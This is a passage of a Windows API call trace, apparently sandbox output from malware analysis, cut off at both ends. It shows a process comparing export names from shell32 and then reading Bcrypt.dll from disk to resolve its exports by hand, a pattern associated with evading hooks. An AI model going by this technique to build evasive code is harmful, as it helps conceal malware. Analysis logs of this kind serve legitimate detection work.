lpString2="AssocCreateForClasses") returned 1 [0238.586] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocGetDetailsOfPropKey") returned 1 [0238.586] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CDefFolderMenu_Create2") returned 1 [0238.586] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CIDLData_CreateFromIDArray") returned 1 [0238.586] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0238.586] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CheckEscapesW") returned 1 [0238.586] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CommandLineToArgvW") returned 1 [0238.586] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLL") returned 1 [0238.586] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLA") returned 1 [0238.586] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLAsUserW") returned 1 [0238.586] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLW") returned 1 [0238.586] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0238.586] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0238.586] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0238.586] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0238.587] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0238.587] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 0 [0238.587] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AppCompat_RunDLLW") returned 1 [0238.587] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocCreateForClasses") returned 1 [0238.587] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0238.587] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0238.587] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0238.587] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0238.587] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CheckEscapesW") returned 1 [0238.587] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CommandLineToArgvW") returned 1 [0238.587] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLL") returned 1 [0238.587] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLA") returned 1 [0238.587] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0238.587] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLW") returned 1 [0238.587] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0238.587] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0238.587] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0238.587] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0238.587] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0238.587] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0238.587] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 0 [0238.587] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AppCompat_RunDLLW") returned 1 [0238.587] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocCreateForClasses") returned 1 [0238.587] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocGetDetailsOfPropKey") returned 1 [0238.587] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CDefFolderMenu_Create2") returned 1 [0238.587] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CIDLData_CreateFromIDArray") returned 1 [0238.588] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0238.588] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CheckEscapesW") returned 1 [0238.588] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CommandLineToArgvW") returned 1 [0238.588] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLL") returned 1 [0238.588] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLA") returned 1 [0238.588] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLAsUserW") returned 1 [0238.588] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLW") returned 1 [0238.588] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0238.588] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0238.588] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0238.588] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0238.588] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0238.588] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0238.588] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0238.588] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="DAD_AutoScroll") returned 0 [0238.588] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AppCompat_RunDLLW") returned 1 [0238.588] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocCreateForClasses") returned 1 [0238.588] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocGetDetailsOfPropKey") returned 1 [0238.588] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CDefFolderMenu_Create2") returned 1 [0238.588] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CIDLData_CreateFromIDArray") returned 1 [0238.588] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0238.588] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CheckEscapesW") returned 1 [0238.588] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CommandLineToArgvW") returned 1 [0238.588] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLL") returned 1 [0238.589] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLA") returned 1 [0238.589] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLAsUserW") returned 1 [0238.589] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLW") returned 1 [0238.589] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0238.589] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0238.589] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0238.589] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0238.589] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0238.589] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0238.589] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0238.589] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_AutoScroll") returned 1 [0238.589] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_DragEnterEx") returned 0 [0238.589] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AppCompat_RunDLLW") returned 1 [0238.589] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocCreateForClasses") returned 1 [0238.589] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0238.589] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CDefFolderMenu_Create2") returned 1 [0238.589] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CIDLData_CreateFromIDArray") returned 1 [0238.589] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0238.589] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CheckEscapesW") returned 1 [0238.589] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CommandLineToArgvW") returned 1 [0238.589] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLL") returned 1 [0238.589] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLA") returned 1 [0238.589] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLAsUserW") returned 1 [0238.590] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLW") returned 1 [0238.590] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0238.590] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0238.590] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0238.590] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0238.590] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0238.590] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0238.863] GetProcessHeap () returned 0x550000 [0238.863] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x4120040 | out: hHeap=0x550000) returned 1 [0239.740] GetProcessHeap () returned 0x550000 [0239.740] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x569390 [0239.741] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffc5bcc0000 [0239.752] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0239.752] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0239.752] GetModuleFileNameA (in: hModule=0x7ffc5bcc0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0239.752] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0239.752] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0239.752] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0239.752] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=159648) returned 1 [0239.752] GetProcessHeap () returned 0x550000 [0239.752] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x26fa0) returned 0x2d62010 [0239.755] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0239.755] ReadFile (in: hFile=0x15c, lpBuffer=0x2d62010, nNumberOfBytesToRead=0x26fa0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d62010*, lpNumberOfBytesRead=0x14f5a4*=0x26fa0, lpOverlapped=0x0) returned 1 [0239.759] CloseHandle (hObject=0x15c) returned 1 [0239.759] lstrcmpA (lpString1="BCryptAddContextFunction", lpString2="BCryptAddContextFunction") returned 0 [0239.759] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunction") returned 1 [0239.759] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunctionProvider") returned 0 [0239.759] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunction") returned 1 [0239.759] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunctionProvider") returned 1 [0239.759] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptCloseAlgorithmProvider") returned 0 [0239.760] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunction") returned 1 [0239.760] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0239.760] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0239.760] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptConfigureContext") returned 0 [0239.760] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunction") returned 1 [0239.760] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunctionProvider") returned 1 [0239.760] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0239.760] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContext") returned 1 [0239.760] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContextFunction") returned 0 [0239.760] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunction") returned 1 [0239.760] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0239.760] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0239.760] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContext") returned 1 [0239.760] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContextFunction") returned 1 [0239.760] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCreateContext") returned 0 [0239.760] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunction") returned 1 [0239.760] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0239.760] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0239.760] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContext") returned 1 [0239.760] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0239.760] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateContext") returned 1 [0239.760] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateHash") returned 0 [0239.760] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunction") returned 1 [0239.760] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0239.760] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0239.760] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContext") returned 1 [0239.760] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContextFunction") returned 1 [0239.761] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateContext") returned 1 [0239.761] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateHash") returned 1 [0239.761] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateMultiHash") returned 0 [0239.761] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunction") returned 1 [0239.761] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0239.761] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0239.761] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContext") returned 1 [0239.761] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0239.761] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateContext") returned 1 [0239.761] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateHash") returned 1 [0239.761] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateMultiHash") returned 1 [0239.761] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptDecrypt") returned 0 [0239.761] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunction") returned 1 [0239.761] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0239.761] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0239.761] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContext") returned 1 [0239.761] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContextFunction") returned 1 [0239.761] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateContext") returned 1 [0239.761] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateHash") returned 1 [0239.761] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateMultiHash") returned 1 [0239.761] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDecrypt") returned 1 [0239.761] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDeleteContext") returned 0 [0239.761] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunction") returned 1 [0239.762] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0239.762] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0239.762] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContext") returned 1 [0239.762] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContextFunction") returned 1 [0239.762] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateContext") returned 1 [0239.762] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateHash") returned 1 [0239.762] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateMultiHash") returned 1 [0239.762] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDecrypt") returned 1 [0239.762] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeleteContext") returned 1 [0239.762] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeriveKey") returned 0 [0239.762] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunction") returned 1 [0239.762] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunctionProvider") returned 1 [0239.762] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0239.762] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContext") returned 1 [0239.762] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContextFunction") returned 1 [0239.762] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateContext") returned 1 [0239.762] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateHash") returned 1 [0239.762] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateMultiHash") returned 1 [0239.762] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDecrypt") returned 1 [0239.762] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeleteContext") returned 1 [0239.762] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKey") returned 1 [0239.762] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKeyCapi") returned 0 [0239.762] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunction") returned 1 [0239.762] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunctionProvider") returned 1 [0239.762] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0239.762] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContext") returned 1 [0239.762] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContextFunction") returned 1 [0239.762] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateContext") returned 1 [0239.763] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateHash") returned 1 [0239.763] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateMultiHash") returned 1 [0239.763] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDecrypt") returned 1 [0239.763] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeleteContext") returned 1 [0239.763] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKey") returned 1 [0239.763] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyCapi") returned 1 [0239.763] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyPBKDF2") returned 0 [0239.763] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunction") returned 1 [0239.763] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0239.763] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0239.763] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContext") returned 1 [0239.763] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContextFunction") returned 1 [0239.763] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateContext") returned 1 [0239.763] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateHash") returned 1 [0239.763] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateMultiHash") returned 1 [0239.763] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDecrypt") returned 1 [0239.763] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeleteContext") returned 1 [0239.763] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKey") returned 1 [0239.763] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0239.763] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0239.763] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDestroyHash") returned 0 [0239.763] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunction") returned 1 [0239.763] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0239.763] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0239.763] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContext") returned 1 [0239.763] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContextFunction") returned 1 [0239.764] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateContext") returned 1 [0239.764] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateHash") returned 1 [0239.764] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateMultiHash") returned 1 [0239.764] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDecrypt") returned 1 [0239.764] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeleteContext") returned 1 [0239.764] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKey") returned 1 [0239.764] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0239.764] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0239.764] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyHash") returned 1 [0239.764] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyKey") returned 0 [0239.764] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunction") returned 1 [0239.764] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunctionProvider") returned 1 [0239.764] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0239.764] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContext") returned 1 [0239.764] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContextFunction") returned 1 [0239.764] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateContext") returned 1 [0239.764] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateHash") returned 1 [0239.764] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateMultiHash") returned 1 [0239.764] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDecrypt") returned 1 [0239.764] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeleteContext") returned 1 [0239.764] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKey") returned 1 [0239.764] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyCapi") returned 1 [0239.764] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0239.764] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyHash") returned 1 [0239.764] lstrcmpA 